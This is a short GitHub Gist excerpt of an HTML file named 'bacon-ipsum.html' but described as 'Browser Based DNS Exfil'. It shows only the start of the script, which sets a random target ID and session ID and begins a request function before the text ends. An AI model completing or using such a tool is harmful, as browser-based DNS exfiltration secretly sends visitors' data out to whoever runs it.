Skip to content

Instantly share code, notes, and snippets.

@tompohl
tompohl / bacon-ipsum.html
Created January 14, 2017 03:48 — forked from nstarke/bacon-ipsum.html
Browser Based DNS Exfil
<!DOCTYPE html>
<html style="width:100%;height:100%;">
<head>
<title>DNS-Exfil.js</title>
<script>
var targetId = Math.round(Math.random() * 1000000);
var sessionId = guid();
function doRequest(){